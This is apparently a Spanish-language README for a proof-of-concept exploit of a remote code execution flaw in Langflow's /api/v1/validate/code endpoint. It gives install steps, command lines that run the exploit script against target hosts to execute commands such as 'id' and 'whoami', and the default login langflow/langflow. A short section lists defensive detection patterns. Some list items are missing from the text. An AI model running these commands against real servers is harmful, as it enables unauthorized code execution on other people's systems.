
Langflow Ejecución Remota de Código (RCE) Prueba de Concepto
Vulnerabilidad de ejecución remota de código en Langflow
Esta vulnerabilidad afecta a:
Langflow
CVE-2026-0770 es una vulnerabilidad de ejecución remota de código (RCE) en el endpoint:
/api/v1/validate/code
Cuando AUTO_LOGIN=true y las credenciales predeterminadas están habilitadas, los atacantes pueden:
El problema se origina en la evaluación insegura de código Python durante la validación.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Asegúrate de tener Python 3.8+ instalado.
Instala las dependencias:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
Inicia la ejecución remota de comandos interactiva:
python3 CVE-2026-0770.py -t http://target:7860
Ejemplo:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
Ejemplo:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
Muestra una salida de depuración detallada.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
Si no se proporciona un token, el script intenta el inicio de sesión automático usando:
username: langflow
password: langflow
Si tiene éxito, obtiene un access_token y continúa.
Los administradores deben:
AUTO_LOGIN/api/v1/validate/codeMonitorear:
Solicitudes POST sospechosas a /api/v1/validate/code
Código que contenga:
__import__subprocessthrow(Exception(Intentos repetidos de inicio de sesión con credenciales predeterminadas
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
Investigador de seguridad | Desarrollador de exploits | Escritor de PoC
Distribuido bajo la Licencia MIT. Consulta la licencia completa aquí:
Este proyecto está destinado a:
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal.